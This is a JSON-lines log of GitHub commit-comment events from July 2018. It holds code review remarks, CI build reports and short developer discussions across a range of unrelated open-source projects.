{"id":"7964880234","type":"CommitCommentEvent","actor":{"login":"xsun2001"},"repo":{"name":"ChinaCreators/LHL"},"payload":{"comment":{"id":29706896,"position":null,"line":null,"path":null,"commit_id":"7d4a84a5e7aa9da288c4869959bc8527ad190132","created_at":"2018-07-14T00:15:50Z","updated_at":"2018-07-14T00:15:50Z","author_association":"COLLABORATOR","body":"@creatorlxd 这个我知道。但是现在应该以通过持续构建为重，具体原因已在qq中答复了。"}},"created_at":"2018-07-14T00:15:50Z"}
{"id":"7964881319","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706898,"position":155,"line":155,"path":"Sources/Views/Cells/TypingBubbleCell.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:16:23Z","updated_at":"2018-07-14T00:16:23Z","author_association":"MEMBER","body":"This probably better suited as a `property`?"}},"created_at":"2018-07-14T00:16:23Z"}
{"id":"7964882175","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706901,"position":29,"line":29,"path":"Sources/Views/Circle.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:16:50Z","updated_at":"2018-07-14T00:16:50Z","author_association":"MEMBER","body":"Definitely can't reserve the name `Circle`, naming is hard :("}},"created_at":"2018-07-14T00:16:50Z"}
{"id":"7964883517","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706903,"position":104,"line":104,"path":"Sources/Views/TypingIndicator.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:17:33Z","updated_at":"2018-07-14T00:17:33Z","author_association":"MEMBER","body":"Same philosophy, shouldn't these be properties?"}},"created_at":"2018-07-14T00:17:33Z"}
{"id":"7964887163","type":"CommitCommentEvent","actor":{"login":"chalmerlowe"},"repo":{"name":"chalmerlowe/jarvis_II"},"payload":{"comment":{"id":29706917,"position":null,"line":null,"path":null,"commit_id":"0a6f70432ed50376cea4842cf51ff8c2f663d517","created_at":"2018-07-14T00:19:37Z","updated_at":"2018-07-14T00:19:37Z","author_association":"OWNER","body":"Jacob\n\nI appreciate your looking into this puzzle.\nA couple of thoughts about my philosophy for the puzzles:\n* solutions should be \"discussable\" in about thirty minutes at a meetup.\n* the generator scripts to create data should produce the desired data and\nshould be simple enough to be a tool to teach (if attendees want to see how\nthe data file was made)\n* should take me the minimum amount of time to make, cause they are\ngenerally \"throw away\" code ... it is highly likely that I won't use them\nagain/often.\n* in this case, i don't really care too much how evenly distributed the\ntokens are... simply because... I will make a file with tokens and people\nwill count them... the answers will be what the answer are.\n\nI spent a decent portion of the day, yesterday, pulling together some code\nand continuing to formulate my ideas for later parts of the puzzles (i.e.\nwe do one part of the puzzle one week in our pyhawaii meetup and then two\nweeks later, we dive into a similar but slightly more sophisticated part\nII, then part III, etc).\n\nMy ideas are very much in flux and evolving as I am crafting generators. In\nthe process of making the generators, I felt that the generator code had\nstarted to become too complex because I was crafting universal code that\ncould create all the various data sets for all the levels of the puzzle.\n\nUltimately, I decided to create utility functions in one script (create a\npalindrome, create a rising number, etc). And for each level/part of the\npuzzle, I decided to create a brand-new generator file that would import\nfrom the utility script and create just the data needed for that part of\nthe puzzle. Thus I would have maybe three OR four generator scripts: one to\ncreate a txt file, one to create a basic json, one to create a more\ncomplicated json, etc.\n\nLong story short, we are both moving forward with creating code at the same\ntime for a problem that is not fully defined, even in my own head.\n\nI am happy to look at your code and happy to discuss ideas. I can't promise\nthat your code will be used, as I am not yet sure how it fits in with the\noverall problem OR even how to merge the code with mine and still follow my\nloosely defined philosophy.\n\nI am happy to dialogue more about this. Just want to make sure we are on\nthe same virtual page.\n\n\n\nOn Fri, Jul 13, 2018, 1:49 PM jacobwilliamroy <notifications@github.com>\nwrote:\n\n> I noticed the following code:\n>\n> def generic(n=6):\n>     '''Return a random sequence of n numbers.\n>     '''\n>     return [randint(0, 9) for digit in range(n)]\n>\n> So RSA tokens are stringy/listy-things, not integers, and tokens are\n> allowed to have leading 0s?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/chalmerlowe/jarvis_II/commit/0a6f70432ed50376cea4842cf51ff8c2f663d517#commitcomment-29706765>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AG9A4NF0n2kf4ISVbU-ZNdKb_gwto3haks5uGTICgaJpZM4VPor_>\n> .\n>\n"}},"created_at":"2018-07-14T00:19:37Z"}
{"id":"7964887990","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706920,"position":28,"line":28,"path":"Sources/Layout/TypingMessageSizeCalculator.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:20:05Z","updated_at":"2018-07-14T00:20:05Z","author_association":"MEMBER","body":"Maybe naming this `TypingIndicatorSizeCalculator`... It's not really a message? But I'm open to leaving it as `TypingMessageSizeCalculator` for the sake on consistency 🤔 "}},"created_at":"2018-07-14T00:20:05Z"}
{"id":"7964888065","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29706921,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-14T00:20:08Z","updated_at":"2018-07-14T00:20:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T00:20:08Z"}
{"id":"7964888928","type":"CommitCommentEvent","actor":{"login":"ashcoll"},"repo":{"name":"ashcoll/vim-plugins"},"payload":{"comment":{"id":29706923,"position":5,"line":4,"path":"README.md","commit_id":"eab067b25c0e403435a77aa15be3b170294fec52","created_at":"2018-07-14T00:20:34Z","updated_at":"2018-07-14T00:20:34Z","author_association":"OWNER","body":"## every vim plugin project is a submodule"}},"created_at":"2018-07-14T00:20:34Z"}
{"id":"7964891457","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706935,"position":null,"line":null,"path":null,"commit_id":"26f1e83eeeb323772e9f31bcda961d2f2af216e3","created_at":"2018-07-14T00:22:00Z","updated_at":"2018-07-14T00:22:00Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - Win64-Windows-7-VisualStudio-14: OK (2937 of 2937 tests passed, 623 test warnings)\n\nMessages:\n\n * 623 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T00:22:00Z"}
{"id":"7964892381","type":"CommitCommentEvent","actor":{"login":"SD10"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29706938,"position":20,"line":133,"path":"Sources/Layout/MessagesCollectionViewFlowLayout.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T00:22:33Z","updated_at":"2018-07-14T00:22:33Z","author_association":"MEMBER","body":"What happens if I want the indicator to be in a section with other cells?"}},"created_at":"2018-07-14T00:22:33Z"}
{"id":"7964905367","type":"CommitCommentEvent","actor":{"login":"ChalapathiRevanth"},"repo":{"name":"TeamInfinity/android_kernel_xiaomi_msm8917-F"},"payload":{"comment":{"id":29706985,"position":null,"line":null,"path":null,"commit_id":"ba80bd0994494acf2010880920643eef5e3e67e1","created_at":"2018-07-14T00:30:22Z","updated_at":"2018-07-14T00:30:22Z","author_association":"NONE","body":"This is a good kang from Franco Kernel! \r\n\r\n@franciscofranco They have kanged Your commit. Without Proper credits & authorship"}},"created_at":"2018-07-14T00:30:22Z"}
{"id":"7964908666","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29706992,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-14T00:32:22Z","updated_at":"2018-07-14T00:32:22Z","author_association":"NONE","body":"I uploaded some optimization changes that I had on my local live copy.  I think there's a few more `refreshneeded` calls that need to be turned off that I had (OvaleHealth comes to mind, probably the one in WildImps too). \r\n\r\nOvale has built in code for deciding when it needs to refresh.  However, currently this is flagged so long as you have a target or a focus so it doesn't really do much except out of combat.  So currently Ovale will update the icons up to 20x per second (at least 0.05 seconds between refreshes).\r\n\r\nWhat I've done is increased the maximum time between refreshes with a target or focus.  Currently a slider in the advanced options defaulting to 250 ms.  Also added a silder to allow it too refresh more often on the minimum too, though I'm not sure whether to expose that one to everyone as they should really be messing with the max first.\r\n\r\nThis results in a pretty drastic cut in CPU utilization (on Beta it went from about 200ms to 40ms average; on my live copy I had it down to 20ms;  this is on target dummies with no one else around).  Between this and the `PLAYER` filter on the auras it should be a pretty significant CPU utilization reduction.\r\n\r\nI think that after these changes \"Laptop\" mode really shouldn't be necessary.  Just change the \"only player buffs/debuffs\" to \"full scan buffs/debuffs\" with a warning in the description that this is very CPU intensive and unnecessary for a majority of scripts.\r\n\r\nI was going to make these changes myself but I might not be able to code for the next few days and so figured I'd give you my thoughts on it since prepatch is in 4 days."}},"created_at":"2018-07-14T00:32:22Z"}
{"id":"7964912474","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706998,"position":null,"line":null,"path":null,"commit_id":"956cf013a8aa3cab3acb77a3aa3cbe4fed28cf78","created_at":"2018-07-14T00:34:41Z","updated_at":"2018-07-14T00:34:41Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2314 of 2314 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-956cf013a8aa3cab3acb77a3aa3cbe4fed28cf78-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-956cf013a8aa3cab3acb77a3aa3cbe4fed28cf78-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T00:34:41Z"}
{"id":"7964912853","type":"CommitCommentEvent","actor":{"login":"vkottler"},"repo":{"name":"badgerloop-software/pod"},"payload":{"comment":{"id":29706999,"position":5,"line":92,"path":"embedded/common/badgerloop.c","commit_id":"a64e9bf080d1924a7708019ccf3cab4b8e4d0b55","created_at":"2018-07-14T00:34:56Z","updated_at":"2018-07-14T00:34:56Z","author_association":"MEMBER","body":"What are you thinking with this function prototype?\r\n\r\nAren't you looking for something more like 'stopping_distance'?"}},"created_at":"2018-07-14T00:34:56Z"}
{"id":"7964913438","type":"CommitCommentEvent","actor":{"login":"vkottler"},"repo":{"name":"badgerloop-software/pod"},"payload":{"comment":{"id":29707000,"position":5,"line":80,"path":"embedded/drivers/can.c","commit_id":"a64e9bf080d1924a7708019ccf3cab4b8e4d0b55","created_at":"2018-07-14T00:35:18Z","updated_at":"2018-07-14T00:35:18Z","author_association":"MEMBER","body":"Why is `state` an `int`?"}},"created_at":"2018-07-14T00:35:18Z"}
{"id":"7964914288","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707002,"position":5,"line":5,"path":"pandas/0038_nogeyama/0126_kenken.txt","commit_id":"81a53fc0032eac3d78991c50599505e535dbe9c3","created_at":"2018-07-14T00:35:52Z","updated_at":"2018-07-14T00:35:52Z","author_association":"CONTRIBUTOR","body":"Yuuka(Tobe)\r\nAyame(Ishikawa)\r\nSumire(Nihondaira)\r\nIchigo(Zoorasia) \r\nKarin(Misaki)"}},"created_at":"2018-07-14T00:35:52Z"}
{"id":"7964914384","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29707003,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-14T00:35:56Z","updated_at":"2018-07-14T00:35:56Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-MacOS-10.9-clang: Tests Failed (2394 of 2924 tests passed, 93 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 567 tests had: ESO small diffs.\n * 529 tests had: Table big diffs.\n * 425 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 18 tests had: ESO big diffs.\n * 99 tests had: AUD diffs.\n * 34 tests had: ZSZ small diffs.\n * 8 tests had: ERR diffs.\n * 7 tests had: MTR big diffs.\n * 2 tests had: MTD diffs.\n * 12 tests had: SSZ small diffs.\n * 7 tests had: Table small diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 93\n * Failed: 530\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-81.87%25-red.png)</a> \n"}},"created_at":"2018-07-14T00:35:56Z"}
{"id":"7964915374","type":"CommitCommentEvent","actor":{"login":"okellogg"},"repo":{"name":"AdaCore/PolyORB"},"payload":{"comment":{"id":29707005,"position":null,"line":null,"path":null,"commit_id":"36fd19d14c4ef584bb7e8cc8829e99ea749015bc","created_at":"2018-07-14T00:36:31Z","updated_at":"2018-07-14T00:36:31Z","author_association":"NONE","body":"Thanks for the fix.\r\nI would like to approve this change but I can't find a button for that."}},"created_at":"2018-07-14T00:36:31Z"}
{"id":"7964917759","type":"CommitCommentEvent","actor":{"login":"vkottler"},"repo":{"name":"badgerloop-software/pod"},"payload":{"comment":{"id":29707013,"position":24,"line":98,"path":"embedded/drivers/can.c","commit_id":"a64e9bf080d1924a7708019ccf3cab4b8e4d0b55","created_at":"2018-07-14T00:38:04Z","updated_at":"2018-07-14T00:38:04Z","author_association":"MEMBER","body":"This is really concerning. You are mutating state in between sending it...? I don't follow"}},"created_at":"2018-07-14T00:38:04Z"}
{"id":"7964918680","type":"CommitCommentEvent","actor":{"login":"patelneel55"},"repo":{"name":"symboxtra/appveyor-discord-webhook"},"payload":{"comment":{"id":29707015,"position":null,"line":null,"path":null,"commit_id":"ec9deed816c5df93dcfbff9f06d229af86544fa9","created_at":"2018-07-14T00:38:40Z","updated_at":"2018-07-14T00:38:40Z","author_association":"MEMBER","body":"Also Closes symboxtra/jenkins-discord-webhook#4"}},"created_at":"2018-07-14T00:38:40Z"}
{"id":"7964919490","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707017,"position":4,"line":4,"path":"pandas/0038_nogeyama/0127_kiku.txt","commit_id":"81a53fc0032eac3d78991c50599505e535dbe9c3","created_at":"2018-07-14T00:39:13Z","updated_at":"2018-07-14T00:39:13Z","author_association":"CONTRIBUTOR","body":"Hiroshima City Asa Zoological Park"}},"created_at":"2018-07-14T00:39:13Z"}
{"id":"7964919671","type":"CommitCommentEvent","actor":{"login":"johnsBeharry"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29707018,"position":null,"line":null,"path":null,"commit_id":"046d68f8c3a415a4b462e8228e25476d46860e2b","created_at":"2018-07-14T00:39:21Z","updated_at":"2018-07-14T00:39:21Z","author_association":"MEMBER","body":"The block-io pip module is just a wrapper for block.io api - so if you want the raw response you may have to do the http requests yourself. That said it's worth looking through the codebase of the module.\r\n\r\n@vindard see here for how `withdraw_from_labels` is setup. I'm quite surprised by the pattern used actually -- but you can still see the requests module is used to call the block.io/api\r\n\r\nhttps://github.com/BlockIo/block_io-python/blob/master/block_io/__init__.py#L154-L163\r\n\r\nSee here for the responses back from the api, and how they get translated to python exceptions.\r\n\r\nhttps://github.com/BlockIo/block_io-python/blob/master/block_io/__init__.py#L260-L305\r\n\r\n(posted in our telegram group)"}},"created_at":"2018-07-14T00:39:21Z"}
{"id":"7964920175","type":"CommitCommentEvent","actor":{"login":"mxew"},"repo":{"name":"PPRAE/pprae.github.io"},"payload":{"comment":{"id":29707019,"position":null,"line":null,"path":null,"commit_id":"9148ff5d23d779ae3eca3027313a27e0c0bc4c6a","created_at":"2018-07-14T00:39:41Z","updated_at":"2018-07-14T00:39:41Z","author_association":"CONTRIBUTOR","body":"end of an era"}},"created_at":"2018-07-14T00:39:41Z"}
{"id":"7964922328","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29707024,"position":null,"line":null,"path":null,"commit_id":"683c605fe6ef2721a2f8dc5994572a8e4e3f9bbb","created_at":"2018-07-14T00:40:46Z","updated_at":"2018-07-14T00:40:46Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/683c605fe6ef2721a2f8dc5994572a8e4e3f9bbb/index.html"}},"created_at":"2018-07-14T00:40:46Z"}
{"id":"7964928847","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29707035,"position":null,"line":null,"path":null,"commit_id":"d7b197d658cae54c3b0fd6c0cee51ee33c343b69","created_at":"2018-07-14T00:44:43Z","updated_at":"2018-07-14T00:44:43Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.333`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/403789540) :tada:"}},"created_at":"2018-07-14T00:44:43Z"}
{"id":"7964932972","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707046,"position":null,"line":null,"path":null,"commit_id":"956cf013a8aa3cab3acb77a3aa3cbe4fed28cf78","created_at":"2018-07-14T00:47:37Z","updated_at":"2018-07-14T00:47:37Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2314 of 2314 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-956cf013a8aa3cab3acb77a3aa3cbe4fed28cf78-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-956cf013a8aa3cab3acb77a3aa3cbe4fed28cf78-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T00:47:37Z"}
{"id":"7964935176","type":"CommitCommentEvent","actor":{"login":"t-w"},"repo":{"name":"t-w/SimpleDHT"},"payload":{"comment":{"id":29707048,"position":null,"line":null,"path":null,"commit_id":"c2c4362fa012bc52a31173b544d04c71a4c5eb99","created_at":"2018-07-14T00:49:12Z","updated_at":"2018-07-14T00:49:12Z","author_association":"OWNER","body":"More info:\r\nhttps://arduino.stackexchange.com/questions/35089/is-there-a-constant-for-the-maximum-unsigned-long-value-in-an-arduino-compiler\r\nhttps://arduino.stackexchange.com/questions/33572/arduino-countdown-without-using-delay/\r\n"}},"created_at":"2018-07-14T00:49:12Z"}
{"id":"7964935369","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29707049,"position":null,"line":null,"path":null,"commit_id":"607517a9874cc85668ca443a2bf5ad69f5e46826","created_at":"2018-07-14T00:49:19Z","updated_at":"2018-07-14T00:49:19Z","author_association":"NONE","body":"### Results for event id: 46d78984-7520-4331-91d1-c6b0c79cca73\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (42388 lines total):**\n\n```\n...\n  A valid environment variable to satisfy the declaration 'env:SLS_SNS_ERROR_TOPIC_ARN' could not be found.\n \n \n Serverless Warning --------------------------------------\n \n  A valid environment variable to satisfy the declaration 'env:SLS_SNS_ERROR_TOPIC_ARN' could not be found.\n \n \n  Serverless Error ---------------------------------------\n \n  Bucket name must start with a letter or number. .serverless.dev\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nFAILURE:  sample-http\n\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 149 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T00:49:19Z"}
{"id":"7964935378","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29707050,"position":null,"line":null,"path":null,"commit_id":"ead6796990bd09b32638a2fca76ab463c15ad1f8","created_at":"2018-07-14T00:49:19Z","updated_at":"2018-07-14T00:49:19Z","author_association":"NONE","body":"### Results for event id: 46d78984-7520-4331-91d1-c6b0c79cca73\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (42388 lines total):**\n\n```\n...\n  A valid environment variable to satisfy the declaration 'env:SLS_SNS_ERROR_TOPIC_ARN' could not be found.\n \n \n Serverless Warning --------------------------------------\n \n  A valid environment variable to satisfy the declaration 'env:SLS_SNS_ERROR_TOPIC_ARN' could not be found.\n \n \n  Serverless Error ---------------------------------------\n \n  Bucket name must start with a letter or number. .serverless.dev\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nFAILURE:  sample-http\n\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 149 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T00:49:19Z"}
{"id":"7964935448","type":"CommitCommentEvent","actor":{"login":"rcastle1"},"repo":{"name":"badgerloop-software/pod"},"payload":{"comment":{"id":29707051,"position":5,"line":80,"path":"embedded/drivers/can.c","commit_id":"a64e9bf080d1924a7708019ccf3cab4b8e4d0b55","created_at":"2018-07-14T00:49:22Z","updated_at":"2018-07-14T00:49:22Z","author_association":"CONTRIBUTOR","body":"State probably isn’t a great name and could be a bool. Was thinking this function would be a prototype that would OR all of the conditions that would trigger stopping\r\n\r\nSent from my iPhone\r\n\r\nOn Jul 13, 2018, at 7:35 PM, Vaughn Kottler <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n\r\nWhy is state an int?\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/badgerloop-software/pod/commit/a64e9bf080d1924a7708019ccf3cab4b8e4d0b55#commitcomment-29707000>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AYo7RwRYSxPZ0GvhQf2bIVnfqh495unBks5uGTzGgaJpZM4VPqCx>.\r\n"}},"created_at":"2018-07-14T00:49:22Z"}
{"id":"7964937975","type":"CommitCommentEvent","actor":{"login":"3v1n0"},"repo":{"name":"ubuntu/snapcraft-desktop-helpers"},"payload":{"comment":{"id":29707055,"position":5,"line":40,"path":"common/init","commit_id":"c3141573c6ef53d2cb35b5fc1f02ad74afdee5b2","created_at":"2018-07-14T00:51:14Z","updated_at":"2018-07-14T00:51:14Z","author_association":"CONTRIBUTOR","body":"I meant after `confinement:` part...\r\n\r\nI can't remember what tests we were doing with @laney too, but we said this was better :-D"}},"created_at":"2018-07-14T00:51:14Z"}
{"id":"7964939180","type":"CommitCommentEvent","actor":{"login":"Proxxaaa"},"repo":{"name":"Goseale/GosealeBot67152348152634615234"},"payload":{"comment":{"id":29707056,"position":null,"line":null,"path":null,"commit_id":"e0340664bee6888571323ac3c7dbb17ce20bf88f","created_at":"2018-07-14T00:52:11Z","updated_at":"2018-07-14T00:52:11Z","author_association":"NONE","body":"ah, I see"}},"created_at":"2018-07-14T00:52:11Z"}
{"id":"7964939412","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29707058,"position":null,"line":null,"path":null,"commit_id":"31d76d99553e823f13a419c03cafa6f18a0442e6","created_at":"2018-07-14T00:52:19Z","updated_at":"2018-07-14T00:52:19Z","author_association":"NONE","body":"BlockedStorm[2] is V(81) and applies to lever or not lever pawns.\r\nThe new value will soon be V(66) (but also suppose the other arrays are adjusted too.)\r\n\r\nIf we are to believe this is a good value\r\nThen if your Thorned value is. say 35, then adjust BlockedStorm[2] by +- 35 according to lever or not lever.\r\n(or change BlockedStorm[2] by BlockedStorm[2] - 35 and use Thorned =70\r\n\r\nHowever, the possibility to create a lever (and open or semi open a file) can only be good news for the attacker. So I would be surprised that a special case for lever/not lever would make a difference.\r\nIf the lever is good for either side, it will soon disappear, else something will move soon, especially close to the king...\r\n\r\nThe other idea could be that our Storm stuff is only used for the midgame score component.\r\nHowever, BlockStorm[2] might be worth something in the endgame too."}},"created_at":"2018-07-14T00:52:19Z"}
{"id":"7964939960","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29707060,"position":35,"line":752,"path":"wiki/plugins/metadata/models.py","commit_id":"4cdbd9b47bb0372b363834b3684a0a523d54c833","created_at":"2018-07-14T00:52:45Z","updated_at":"2018-07-14T00:52:45Z","author_association":"CONTRIBUTOR","body":"I think you can just use `RegexField(r'[0-9]', max_length=200, null=True, verbose_name=\"Version\")`"}},"created_at":"2018-07-14T00:52:45Z"}
{"id":"7964941873","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29707065,"position":null,"line":null,"path":null,"commit_id":"30ab265e9e6f6b4109c45ca657bc7212961369ee","created_at":"2018-07-14T00:54:07Z","updated_at":"2018-07-14T00:54:07Z","author_association":"COLLABORATOR","body":"- New overlay and stuff is back"}},"created_at":"2018-07-14T00:54:07Z"}
{"id":"7964943531","type":"CommitCommentEvent","actor":{"login":"vkottler"},"repo":{"name":"badgerloop-software/pod"},"payload":{"comment":{"id":29707071,"position":5,"line":80,"path":"embedded/drivers/can.c","commit_id":"a64e9bf080d1924a7708019ccf3cab4b8e4d0b55","created_at":"2018-07-14T00:55:20Z","updated_at":"2018-07-14T00:55:20Z","author_association":"MEMBER","body":"Give the function or the parameter a better name and make sure to define flags if you go that route"}},"created_at":"2018-07-14T00:55:20Z"}
{"id":"7964945479","type":"CommitCommentEvent","actor":{"login":"Bruno-Bernardo"},"repo":{"name":"DavidDimon/achado-perdido"},"payload":{"comment":{"id":29707081,"position":null,"line":null,"path":null,"commit_id":"36f4ad0c120c3be328b4e9fb3cf898fe0b71d71a","created_at":"2018-07-14T00:56:49Z","updated_at":"2018-07-14T00:56:49Z","author_association":"COLLABORATOR","body":"Com estas alterações agora o cadastro do objeto ja esta funcionando normalmente."}},"created_at":"2018-07-14T00:56:49Z"}
